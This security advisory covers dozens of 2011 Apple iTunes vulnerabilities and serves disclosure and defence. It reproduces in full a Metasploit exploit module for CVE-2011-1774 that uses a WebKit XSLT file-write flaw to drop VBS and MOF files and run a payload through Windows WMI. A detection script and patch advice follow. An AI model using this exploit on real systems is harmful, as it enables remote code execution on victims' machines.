Apple iTunes Multiple Security Vulnerabilities

Published: 2011-10-13
Updated: 2011-10-13

Affected systems:
Apple iTunes 10.x
Description:
CVE ID: CVE-2010-1823,CVE-2011-0164,CVE-2011-0200,CVE-2011-0204,CVE-2011-0215,CVE-2011-0218,CVE-2011-0221,CVE-2011-0222,CVE-2011-0223,CVE-2011-0225,CVE-2011-0232,CVE-2011-0233,CVE-2011-0234,CVE-2011-0235,CVE-2011-0237,CVE-2011-0238,CVE-2011-0240,CVE-2011-0253,CVE-2011-0254,CVE-2011-0255,CVE-2011-0259,CVE-2011-0981,CVE-2011-0983,CVE-2011-1109,CVE-2011-1114,CVE-2011-1115,CVE-2011-1117,CVE-2011-1121,CVE-2011-1188,CVE-2011-1203,CVE-2011-1204,CVE-2011-1288,CVE-2011-1293,CVE-2011-1296,CVE-2011-1440,CVE-2011-1449,CVE-2011-1451,CVE-2011-1453,CVE-2011-1457,CVE-2011-1462,CVE-2011-1774,CVE-2011-1797,CVE-2011-2338,CVE-2011-2339,CVE-2011-2341,CVE-2011-2351,CVE-2011-2352,CVE-2011-2354,CVE-2011-2356,CVE-2011-2359,CVE-2011-2788,CVE-2011-2790,CVE-2011-2792,CVE-2011-2797,CVE-2011-2799,CVE-2011-2809,CVE-2011-2811,CVE-2011-2813,CVE-2011-2814,CVE-2011-2815,CVE-2011-2816,CVE-2011-2817,CVE-2011-2818,CVE-2011-2820,CVE-2011-2823,CVE-2011-2827,CVE-2011-2831,CVE-2011-3219,CVE-2011-3232,CVE-2011-3233,CVE-2011-3234,CVE-2011-3235,CVE-2011-3236,CVE-2011-3237,CVE-2011-3238,CVE-2011-3239,CVE-2011-3241,CVE-2011-3244,CVE-2011-3252

iTunes is a media player application introduced by Apple Computer on January 10, 2001 at the Macworld Expo in San Francisco. It is used to play and manage digital music and video files, and is the primary tool for managing the files on an Apple iPod.

Apple iTunes contains multiple implementation vulnerabilities that malicious users can exploit to disclose sensitive information, manipulate certain data, conduct cross-site scripting and spoofing attacks, bypass certain security restrictions, and take control of a user's system.

1) An error in the CoreFoundation component when handling string tokenization can be exploited, via a man-in-the-middle attack, to corrupt memory.

2) An error in the CoreAudio component when processing AAC streams can cause a buffer overflow.

3) An error in the CoreMedia component when processing H.264-encoded files can cause a buffer overflow.

4) An error in the WebKit component, when AddressSanitizer is in use, can cause memory corruption.

5) Multiple errors in the WebKit component can be exploited to corrupt memory.

<*Source: vendor
  
  Link: http://support.apple.com/kb/HT4981
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users assume all risk!

vendor provided the following test method:

http://www.exploit-db.com/download/17993

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::EXE
    include Msf::Exploit::WbemExec

    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'Apple Safari Webkit libxslt Arbitrary File Creation',
            'Description'     => %q{
                    This module exploits a file creation vulnerability in the Webkit
                rendering engine. It is possible to redirect the output of a XSLT
                transformation to an arbitrary file. The content of the created file must be
                ASCII or UTF-8. The destination path can be relative or absolute. This module
                has been tested on Safari and Maxthon. Code execution can be achieved by first
                uploading the payload to the remote machine in VBS format, and then upload a MOF
                file, which enables Windows Management Instrumentation service to execute the VBS.
            },
            'License'         => MSF_LICENSE,
            'Author'          => ['Nicolas Gregoire'],
            'Version'         => '$Revision: 13987 $',
            'References'      =>
                [
                    ['CVE', '2011-1774'],
                    ['OSVDB', '74017'],
                    ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],
                ],
            'DefaultOptions'  =>
                {
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'         =>
                {
                    'Space' => 2048,
                },
            'Platform'        => 'win',
            'Targets'         =>
                [
                    #Windows before Vista
                    [ 'Automatic', { } ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Jul 20 2011'))
    end

    def autofilter
        false
    end

    def check_dependencies
        use_zlib
    end

    def on_request_uri(cli, request)
        # Check target before attacking
        agent = request.headers['User-Agent']
        if agent !~ /Windows NT 5\.1/ or agent !~ /Safari/ or agent !~ /Version\/5\.0\.\d/
            print_error("This target isn't supported: #{agent.to_s}")
            send_not_found(cli)
            return
        end

        url =  "http://"
        url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        url += ":" + datastore['SRVPORT'] + get_resource() + "/"

        content = <<-EOS
<?xml-stylesheet type="text/xml" href="#fragment"?>
<!-- Define the DTD of the document
     This is needed, in order to later reference the XSLT stylesheet by a #fragment
     This trick allows to have both the XML and the XSL in the same file
     Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED
>]>
<doc>

<!-- Define location and content of the files -->
<mof>
    <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location>
    <content><![CDATA[#{@mof_content}]]></content>
</mof><vbs>
    <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location>
    <content><![CDATA[#{@vbs_content}]]></content>
</vbs>

<!-- The XSLT stylesheet header, including the "sx" extension -->
<xsl:stylesheet id="fragment" version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:sx="http://icl.com/saxon"
  extension-element-prefixes="sx"
  xmlns="http://www.w3.org/1999/xhtml" >
<xsl:output method="xml" indent="yes" />

<!-- The XSLT template -->
<xsl:template match="/">
    <!-- Define some XSLT variables -->
    <xsl:variable name="moflocation" select="//mof/location/text()"/>
    <xsl:variable name="vbslocation" select="//vbs/location/text()"/>
    <!-- Create the files -->
    <sx:output file="{$vbslocation}" method="text">
        <xsl:value-of select="//vbs/content"/>
    </sx:output>
    <sx:output file="{$moflocation}" method="text">
        <xsl:value-of select="//mof/content"/>
    </sx:output>
    <!-- Some output to the browser -->
    <html> </html>
</xsl:template>
</xsl:stylesheet>
</doc>
        EOS

        #Clear the extra tabs
        content = content.gsub(/^\t\t/, '')

        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
        send_response(cli, content, {'Content-Type'=>'application/xml'})
        handler(cli)

    end

    def exploit
        # In order to save binary data to the file system the payload is written to a VBS
        # file and execute it from there via a MOF
        @mof_name = rand_text_alpha(rand(5)+5) + ".mof"
        @vbs_name = rand_text_alpha(rand(5)+5) + ".vbs"

        print_status("Encoding payload into vbs...")
        payload = generate_payload_exe
        @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)

        print_status("Generating mof file...")
        @mof_content = generate_mof(@mof_name, @vbs_name)
        super
    end

end
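The module above drops files by embedding an XSLT stylesheet in the same XML document it styles (an xml-stylesheet processing instruction pointing at a "#fragment" inside the document) and then pointing a Saxon extension element's file attribute at the destination path. The script below is an added detection example written for this advisory; it is not part of the page, the module, or any Apple or Metasploit code. It scans an XML document for that pattern so a proxy, mail gateway or file-scanning pipeline can flag it. The sample documents are constructed. The icl.com/saxon namespace and sx:output come from the module; the newer Saxon namespace, Xalan's redirect:write and XSLT 2.0's xsl:result-document are known file-writing constructs added as a generalization of the same pattern.

```python
"""Flag XML/XSLT documents that redirect transformation output to a file.

Added detection example for this advisory (not the page's own code).
All sample documents below are constructed, not captured traffic.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"

# (namespace, local-name) -> attribute naming the destination file.
# icl.com/saxon + output is what the module on this page uses; the others
# are a generalization (later Saxon namespace, Xalan redirect, XSLT 2.0).
FILE_OUTPUT_ELEMENTS: Dict[Tuple[str, str], str] = {
    ("http://icl.com/saxon", "output"): "file",
    ("http://saxon.sf.net/", "output"): "file",
    ("http://xml.apache.org/xalan/redirect", "write"): "file",
    (XSLT_NS, "result-document"): "href",
}

# xml-stylesheet PI whose href points back into the same document ("#...").
FRAGMENT_PI_RE = re.compile(r"<\?xml-stylesheet[^>]*href\s*=\s*[\"']#", re.I)

# ElementTree renders namespaced tags as "{namespace}local".
_QNAME_RE = re.compile(r"\{(.*)\}(.*)")


def scan_document(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    if FRAGMENT_PI_RE.search(text):
        findings.append("xml-stylesheet PI references an in-document fragment")
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        # Malformed input still deserves a verdict: fall back to a raw
        # namespace-URI match instead of silently passing it through.
        findings.append(f"not well-formed ({exc}); falling back to raw namespace match")
        for ns, _local in FILE_OUTPUT_ELEMENTS:
            if ns != XSLT_NS and ns in text:
                findings.append(f"file-output extension namespace present: {ns}")
        return findings
    for el in root.iter():
        m = _QNAME_RE.match(el.tag)
        if not m:
            continue  # element without a namespace cannot be an extension element
        ns, local = m.groups()
        attr = FILE_OUTPUT_ELEMENTS.get((ns, local))
        if attr and attr in el.attrib:
            # The attribute is reported verbatim: an AVT such as {$dest}
            # means the real path is computed at transform time.
            findings.append(f"{local} ({ns}) writes to {el.attrib[attr]!r}")
    return findings


# Constructed sample shaped like the module's payload: PI -> "#fragment",
# inline stylesheet, Saxon extension element writing to a file.
SUSPICIOUS = """<?xml-stylesheet type="text/xml" href="#fragment"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet id ID #REQUIRED>
]>
<doc>
<xsl:stylesheet id="fragment" version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:sx="http://icl.com/saxon"
  extension-element-prefixes="sx">
  <xsl:variable name="dest" select="'placeholder.txt'"/>
  <xsl:template match="/">
    <sx:output file="{$dest}" method="text">
      <xsl:value-of select="//payload"/>
    </sx:output>
  </xsl:template>
</xsl:stylesheet>
</doc>
"""

# Constructed benign stylesheet: xsl:output only selects a method, no file.
BENIGN = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/"><html><body><xsl:value-of select="//title"/></body></html></xsl:template>
</xsl:stylesheet>
"""

# Constructed truncated document, to exercise the not-well-formed path.
MALFORMED = '<doc xmlns:sx="http://icl.com/saxon"><sx:output file="x">'


if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS), ("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, "->", scan_document(doc) or "clean")
```

Run it directly to see a verdict for each sample. The PI check runs on the raw text before parsing, so even a document that the XML parser rejects is still classified; in a gateway you would treat any non-empty finding list for content served as application/xml to a WebKit-based client as worth a block or an alert.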

Recommendations:
Vendor patches:

Apple
-----
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://support.apple.com/

This security vulnerability advisory was translated and compiled by 绿盟科技 (NSFOCUS). All rights reserved; reproduction without permission is prohibited.